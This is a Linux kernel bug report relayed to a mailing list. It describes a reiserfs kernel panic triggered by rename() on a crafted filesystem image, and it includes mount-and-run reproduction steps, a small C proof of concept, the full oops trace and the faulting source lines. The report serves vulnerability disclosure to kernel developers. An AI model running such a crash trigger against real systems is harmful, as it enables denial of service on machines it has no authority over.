https://bugzilla.kernel.org/show_bug.cgi?id=200343 Bug ID: 200343 Summary: kernel panic in entry_points_to_object() when rename() file on a reiserfs filesystem Product: File System Version: 2.5 Kernel Version: 4.18 Hardware: All OS: Linux Tree: Mainline Status: NEW Severity: normal Priority: P1 Component: ReiserFS Assignee: reiserfs-devel@xxxxxxxxxxxxxxx Reporter: wen.xu@xxxxxxxxxx Regression: No Created attachment 276997 --> https://bugzilla.kernel.org/attachment.cgi?id=276997&action=edit The (compressed) crafted image which causes crash - Reproduce # mkdir mnt # mount -t reiserfs -o acl,user_xattr 154.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *foo_bar_baz; char *foo_baz; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint); err = asprintf(&foo_baz, "%s/foo/baz", mpoint); rename(foo_bar_baz, foo_baz); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 341.337045] REISERFS (device loop0): found reiserfs format "3.6" with standard journal [ 341.337109] REISERFS (device loop0): using ordered data mode [ 341.337115] reiserfs: using flush barriers [ 341.338556] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 [ 341.340934] REISERFS (device loop0): checking transaction log (loop0) [ 342.285551] REISERFS (device loop0): Using r5 hash to sort names [ 358.439533] REISERFS panic (device loop0): vs-7042 entry_points_to_object: entry must be visible [ 358.439609] ------------[ cut here ]------------ [ 358.439613] kernel BUG at fs/reiserfs/prints.c:369! [ 358.441701] invalid opcode: 0000 [#1] SMP KASAN PTI [ 358.442735] CPU: 0 PID: 1426 Comm: a.out Not tainted 4.18.0-rc1+ #8 [ 358.444005] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 358.445950] RIP: 0010:__reiserfs_panic+0xe2/0x130 [ 358.446907] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 [ 358.450650] RSP: 0018:ffff8801deddf448 EFLAGS: 00010286 [ 358.452016] RAX: 0000000000000054 RBX: ffffffffa693a200 RCX: 0000000000000000 [ 358.453438] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bdbbe7f [ 358.470539] RBP: ffff8801deddf4f8 R08: ffffed003edc4f21 R09: ffffed003edc4f21 [ 358.471979] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801e8ba3b80 [ 358.473398] R13: ffffffffa693a940 R14: 0000000000000003 R15: ffff8801d0b86500 [ 358.474835] FS: 00007f12bd2fa700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 358.476433] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 358.477578] CR2: 00000000020f0008 CR3: 00000001e7704000 CR4: 00000000000006f0 [ 358.479010] Call Trace: [ 358.479529] ? reiserfs_debug+0x10/0x10 [ 358.480313] entry_points_to_object+0xfd/0x120 [ 358.481209] reiserfs_rename+0x924/0xfc0 [ 358.482004] ? search_by_key+0x13b5/0x19d0 [ 358.482842] ? reiserfs_create+0x3d0/0x3d0 [ 358.483703] ? __asan_loadN+0xf/0x20 [ 358.484441] ? pathrelse+0x70/0x70 [ 358.485161] ? unwind_get_return_address+0x36/0x50 [ 358.486136] ? __save_stack_trace+0x92/0x100 [ 358.487017] ? __asan_loadN+0xf/0x20 [ 358.487746] ? search_by_entry_key+0x20c/0x4b0 [ 358.488643] ? __asan_loadN+0xf/0x20 [ 358.489378] ? kasan_check_write+0x14/0x20 [ 358.490237] ? blk_mq_debugfs_unregister_sched_hctx+0x50/0x50 [ 358.491429] ? _cond_resched+0x1a/0x50 [ 358.492206] vfs_rename+0xa70/0xda0 [ 358.492921] ? vfs_rename+0xa70/0xda0 [ 358.493667] ? path_mountpoint+0x940/0x940 [ 358.494498] ? kasan_check_write+0x14/0x20 [ 358.495354] ? security_path_rename+0xcb/0x130 [ 358.496257] do_renameat2+0x7d2/0x860 [ 358.497004] ? user_path_create+0x40/0x40 [ 358.497836] ? __vma_link_rb+0x12a/0x160 [ 358.498640] ? userfaultfd_unmap_complete+0x9c/0x1d0 [ 358.499655] ? handle_mm_fault+0x24b/0x380 [ 358.500496] ? mm_fault_error+0x1f0/0x1f0 [ 358.501314] ? vm_brk+0x20/0x20 [ 358.501959] __x64_sys_rename+0x3b/0x50 [ 358.502764] do_syscall_64+0x78/0x170 [ 358.503523] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 358.504556] RIP: 0033:0x7f12bcd80367 [ 358.505283] Code: 75 12 48 89 df e8 a9 d7 08 00 85 c0 0f 95 c0 0f b6 c0 f7 d8 5b c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b8 52 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 01 8b 35 00 f7 d8 64 89 01 48 [ 358.509030] RSP: 002b:00007ffed9c1c9f8 EFLAGS: 00000202 ORIG_RAX: 0000000000000052 [ 358.510521] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f12bcd80367 [ 358.511950] RDX: 00000000020f00a0 RSI: 00000000020f00a0 RDI: 00000000020f0080 [ 358.513359] RBP: 00007ffed9c1ca30 R08: 00000000020f0010 R09: 0000000000000000 [ 358.514779] R10: 0000000000000640 R11: 0000000000000202 R12: 0000000000400530 [ 358.516190] R13: 00007ffed9c1cb30 R14: 0000000000000000 R15: 0000000000000000 [ 358.517602] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 358.527284] ---[ end trace 2e85051acb5f6dc1 ]--- [ 358.528655] RIP: 0010:__reiserfs_panic+0xe2/0x130 [ 358.529693] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 [ 358.533670] RSP: 0018:ffff8801deddf448 EFLAGS: 00010286 [ 358.534837] RAX: 0000000000000054 RBX: ffffffffa693a200 RCX: 0000000000000000 [ 358.536320] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bdbbe7f [ 358.537750] RBP: ffff8801deddf4f8 R08: ffffed003edc4f21 R09: ffffed003edc4f21 [ 358.539185] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801e8ba3b80 [ 358.540646] R13: ffffffffa693a940 R14: 0000000000000003 R15: ffff8801d0b86500 [ 358.542084] FS: 00007f12bd2fa700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 358.543738] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 358.544901] CR2: 00000000020f0008 CR3: 00000001e7704000 CR4: 00000000000006f0 - Location https://elixir.bootlin.com/linux/latest/source/fs/reiserfs/namei.c#L1278 if (inode) { if (!de_visible(de->de_deh + de->de_entry_num)) reiserfs_panic(inode->i_sb, "vs-7042", "entry must be visible"); return (de->de_objectid == inode->i_ino) ? 1 : 0; } Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech. -- You are receiving this mail because: You are the assignee for the bug.-- To unsubscribe from this list: send the line "unsubscribe reiserfs-devel" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html
